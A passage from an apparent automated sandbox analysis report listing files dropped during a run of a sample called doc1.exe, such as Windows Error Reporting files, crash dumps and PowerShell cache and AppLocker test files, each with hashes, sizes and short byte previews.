                          Entropy (8bit):3.6926520536952654
                          Encrypted:false
                          SSDEEP:192:R6l7wVeJFr616YNXSU65tgmfZBo2prL89brssf0z5m:R6lXJp616YtSU65tgmf/oPr/f5
                          MD5:044131190BAA88153A3A5699D6CFD11D
                          SHA1:D69874C5712C0309736DA8CB6899B3FDFE3249C7
                          SHA-256:416418B133207F9501C853FC5622F3B7C014F3FD477C111F33C3AF17ECFE9969
                          SHA-512:1A5DFDD8A1625771DC76CE0DA2C22844523E158D5497DEF12344ED08E366433C40018FA26F3CB108EB1DB1B19A83DB979099B8DB98D40448772AFDFC6B49EABD
                          Malicious:false
                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.4.2.0.<./.P.i.
                          Process:C:\Windows\System32\wermgr.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4899
                          Entropy (8bit):4.566883328274401
                          Encrypted:false
                          SSDEEP:48:cvIwWl8zs3Jg771I9GhWpW8VYooYm8M4JFKlnOtSF1yq8vT0OtCGytf2gd:uIjfZI79w7VpJFKln7WT0fGuf2gd
                          MD5:875F54116352645A26A499380A52B897
                          SHA1:5C46D65568D1CD873E3BBCD57E1947CA300F9A2E
                          SHA-256:B9507B90E2BF0A3DC0ECB3E71A87FA176C1419D1D8680E24112CF050160D5B75
                          SHA-512:BFFDAD847284F47D98CDB8D176D7CA2F698E872DA60FE35A4F44EEA211C8106B4BAEDF0FBF86E696524C9479158BFBA53E391631DEDF023CBC552F3DC07F2131
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="474307" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4745
                          Entropy (8bit):4.46275212136694
                          Encrypted:false
                          SSDEEP:48:cvIwWl8zs3Jg77aI9GhWpW8VYQYm8M4JSDuFc+q8vMDCmLdd:uIjfZI7ow7V0JGKVmLdd
                          MD5:9B48EE6B901F24222034BA9E24E70CDA
                          SHA1:2405900ACBEB4D8EBABCA08C996AB20CDEACEFD0
                          SHA-256:7562AF8BAF56F4371818CC130823136435863AD83ABAEF94F10306E5ACD5C9DD
                          SHA-512:406E9445F9A3EF554FD0918E4F8741A43C900EF1CC4FEF0E9894B95F91917426DB33B3566CC7D613576E45A596123FD2A49537819E2ABA348164DF51B59ACA39
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="474307" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Mini DuMP crash report, 15 streams, Tue Aug 27 18:03:27 2024, 0x1205a4 type
                          Category:dropped
                          Size (bytes):242062
                          Entropy (8bit):4.024825133265541
                          Encrypted:false
                          SSDEEP:1536:4j09aAjUAVEJ/nxKiMfg4rD+HCDAtTzguBojRRapN4uE2aOqSVX7VqMLTg68v:4j2PlPKHERc4uEqqyHLTg68
                          MD5:4F565758407DCD6291335FA5B68F16DE
                          SHA1:864232BF1440392EB25E40DD02A8A76D110FDE77
                          SHA-256:20279F9D6D2D00B5B08B92C3ECF22754115F88A423BD483C1051DE7DCA41CFBB
                          SHA-512:80E73E801D6AFF7AF1E69FC24F1184812962850B9DE36362952779253D293C30A1A3D201D839587F87B17F7309BFF85D6B7D7F1C052D7933AC938F684BE1D3E3
                          Malicious:false
                          Preview:MDMP..a..... ..........f....................................<... .......4 ...@..........`.......8...........T............)..............\...........H ..............................................................................eJ....... ......GenuineIntel............T....... ......f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\System32\wermgr.exe
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):7414
                          Entropy (8bit):3.682057537562879
                          Encrypted:false
                          SSDEEP:96:RSIU6o7wVetbW88vR1S6YDURsvgmfHNV9rewSS5aMOcuZm:R6l7wVeJW88vW6YDUSgmftq0pOcEm
                          MD5:2A18F3700EF4365269B568145EC267EA
                          SHA1:9A24A4C5C221E9D298D8EED57F2ED2E50AED70B3
                          SHA-256:7A56F0CD3147600DF0865437B0F5B6388018F29554D1DE8664E23127CCD449B2
                          SHA-512:4C1B4AFF4C577AF5BD5C4BAFC18C0D76539B1D32F9141040C145990EC0F045EE68FB07931DF6BF061E0E9ED2ADA744A48AEBAD5DEF7ACB6DC0EAC5D0ACA20F70
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>19045</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>.. <Revision>2006</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>3508</Pi
                          Process:C:\Windows\System32\wermgr.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4899
                          Entropy (8bit):4.563278144410297
                          Encrypted:false
                          SSDEEP:48:cvIwWl8zsIJg771I9GhWpW8VYc/Ym8M4JFKlnOtSFeUwjyq8vT0Otsytfyd:uIjfOI79w7VNiJFKlnU7jWT0lufyd
                          MD5:58A56A1C6E53BD062D8E8936B308A3F4
                          SHA1:678C98D07352AB9AE273165A25BE6905E07578EC
                          SHA-256:30665BF41867F939988DCB178BE630EADE4FC17368348D034474C159755E1426
                          SHA-512:DF36694652214D5B556F8ADB40E2B424A8E81D353399CE7826C1DC2D25D02980E606E19A9ACC6F8C7C5FE25AF8B291942415C9DBF01802CC952C18DF9323BB39
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="474306" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):8378
                          Entropy (8bit):3.693251998712331
                          Encrypted:false
                          SSDEEP:192:R6l7wVeJKW6v6YmWSUf3WgmfZBo2pr189bszsfeEm:R6lXJ76v6YfSUf3Wgmf/oBsYf0
                          MD5:0367EE54B59CDD3E14A640257697EFE2
                          SHA1:72F6C62D62D9FC26887F71EA19F99D27F5623AB4
                          SHA-256:9C6E68661D19306312C28D076B272DE8F0E759C4B7F5E71DF1E232E795153C6A
                          SHA-512:2E8EF8F437D8BBAC53EFF3899A3D3FDECE50BBA9AA9A3E3B83904CA09D39512FF850FDEF60D25D9CC80068EA88C31268C46F14A95277F838EDABBD783C55B01E
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>19045</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>.. <Revision>2006</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>4896</Pi
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4745
                          Entropy (8bit):4.4585120067582205
                          Encrypted:false
                          SSDEEP:48:cvIwWl8zsIJg77aI9GhWpW8VYCYm8M4JSDuFmI+q8vMDpmLfd:uIjfOI7ow7VyJXKqmLfd
                          MD5:ABECA0C77024EB6B49ECC86969A16A8B
                          SHA1:D8564B97C3BA991456B95BA09BDF0991ACAC4989
                          SHA-256:C41125A30FA044AF18D321C03E290634B9C943B5FF54C859705DD16E9D3E6A22
                          SHA-512:BE4A40A7AEEB8BCE8B8532440AC1CEB44F5D011B5946FDEFEE3F55E887409DEADB0651F168E8602E8CC47E79562AF58456E353DB53451506E03F3464DF0A752D
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="474306" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Mini DuMP crash report, 15 streams, Tue Aug 27 18:03:39 2024, 0x1205a4 type
                          Category:dropped
                          Size (bytes):244822
                          Entropy (8bit):4.013179212382674
                          Encrypted:false
                          SSDEEP:3072:V7YCRgdLEwOaPupecnc4uEqlylMLTgr1:V7YtBEwsecnc4oyoTgr
                          MD5:317D608389DA833704AE9F411DBE6792
                          SHA1:A037471138BCAB1FB4A3489159DA9EBDBBFF3CE2
                          SHA-256:160FA4F3962CA922442EE7F7008ADBB8F7F2FB9D7942806D29036D8DED3CBCC6
                          SHA-512:1716DCDD433A415E49FE4DBE584E0419E8BFB6233326C28821341BF99DAE217103BC1B97C0876237FBD25D4A1DF18A0EE3308D1181962EA10DD03A0EE6728B94
                          Malicious:false
                          Preview:MDMP..a..... ..........f....................................<... ........ ...@..........`.......8...........T............)..f...........\...........H ..............................................................................eJ....... ......GenuineIntel............T..............f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\System32\wermgr.exe
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):7416
                          Entropy (8bit):3.6838938464285453
                          Encrypted:false
                          SSDEEP:96:RSIU6o7wVetbtR0X8P8A56M/16YD5FgmfHNV9rewSS5aM5Rm:R6l7wVeJr0Xcg+6YD5Fgmftq0p5Rm
                          MD5:2190C073E85427DDAB25683FB8309B61
                          SHA1:C991E8F9602A24D1473314CDB501C38D21DE57DA
                          SHA-256:E96C56B327943667A8093081F3B30681D7E4CCB1B42C955EA61832B44FB2D0FF
                          SHA-512:58A4BA09263AFC8DC93BE8F7A2E3B41E1C151F8265A346E0628C80B9E0A337D6FA6AA28591530BDCB94886DB9EEEE9D2E0F7FA603EAC4E31C9E1637AA42C6006
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>19045</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>.. <Revision>2006</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>2188</Pi
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):8374
                          Entropy (8bit):3.691188298975344
                          Encrypted:false
                          SSDEEP:192:R6l7wVeJ9w6M6Y7vSUXUgegmfZBo2prp89bTcsfZ6Rm:R6lXJq6M6YzSUXUZgmf/o1TvfZ1
                          MD5:0B32AE00C336C9D3C89FDCB145F60379
                          SHA1:EAEEF9DEA0D3E1D07E69D87476A82BB0EA7878C9
                          SHA-256:E2A2755EF403093A2668599DBD9E10E7674FD8D015EA3DA8250762ACBCD022AC
                          SHA-512:AF7DCE1BA1D8BE60B6CE5555BC44543AC7C48FDFDECB37EC50CCA35FFF843EEA5D2F4867AA668184BE4D09A7F7DED724DA03AEC209E35F2BF9005911A0C0F8C1
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>19045</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>.. <Revision>2006</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>400</Pid
                          Process:C:\Windows\System32\wermgr.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4899
                          Entropy (8bit):4.566938860223975
                          Encrypted:false
                          SSDEEP:48:cvIwWl8zsIJg771I9GhWpW8VYoYm8M4JFKlnOtSFUyq8vT0OtnKytfsd:uIjfOI79w7VsJFKlnGWT0Xufsd
                          MD5:12742A69F49E210AF52EA3A37FDDF28C
                          SHA1:3B23B31BCFD2DB05A404B08D6C684BED8C9E09C8
                          SHA-256:3D7EC9CBF5FDBA0CDB69D993DB23B598232FC75B1535594AD047517F0212E763
                          SHA-512:96684178EC8EAA337302C930BDC8AC5297297B14E5410A8764C54462BBB49B1AFC2E8C6D64AE31A6C22BDC7D3368C81CE9BE69D7365FA17CFFCB588759E5D5CF
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="474306" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4745
                          Entropy (8bit):4.461302366605539
                          Encrypted:false
                          SSDEEP:48:cvIwWl8zsIJg77aI9GhWpW8VY6Ym8M4JSDuFP+q8vMDzmLJd:uIjfOI7ow7V+JdKkmLJd
                          MD5:7A126B66555C2D44659344EB8C982B2A
                          SHA1:1C3BAF0361A28D1BFE5F51B974F461138089290C
                          SHA-256:10EAC96FB82FB03EAAE37D69D4AA4F84056E65CE8B025C3BD5C841C08B5C8AE6
                          SHA-512:87C598529C713B711DAF56C7B0A546CF276C43B77B65F59CC29FCFA1D4DD3324C2F9BBDE1C34B36A3BCF8CE724882E1F3A69B5FDD0D7990C465232486EBDCCD0
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="474306" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:modified
                          Size (bytes):9713
                          Entropy (8bit):4.940954773740904
                          Encrypted:false
                          SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
                          MD5:BA7C69EBE30EC7DA697D2772E36A746D
                          SHA1:DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
                          SHA-256:CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
                          SHA-512:E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
                          Malicious:false
                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):3256
                          Entropy (8bit):5.418960443302548
                          Encrypted:false
                          SSDEEP:96:hEzlHxvIIwLz9qrh7Kf+oRJ5Eo9Adrxww:m1xAJErAfRLL27
                          MD5:4240CDBE4622A323637296FF70E79B21
                          SHA1:E6AC13310BDD89EEDFF7FA42953B1FAA9311F2DC
                          SHA-256:6EB07989159037D013B705021140641782270FFAD03059EB295A17D56C3B99CF
                          SHA-512:3C1F868D71DCE10E11C84A68A5AA42DDFB28AE30B31B64B759058DF8CF5C0F6E315A632379FFE3FF77CA4CB368FED17CE456CAA2AB9FE05A9A56C8D9532C0562
                          Malicious:false
                          Preview:@...e.................................L..............@..........H..............@-....f.J.|.7h8..q.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Users\user\Desktop\doc1.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):13730
                          Entropy (8bit):3.9144782000199303
                          Encrypted:false
                          SSDEEP:384:JEMYUlp+y4DdVWrXDL6SuvTra0qtRFWSBQXbH:KIp+y4ZYvGVvT3qtKYQT
                          MD5:49B536466D2D4C84BBC92F01D2EA766F
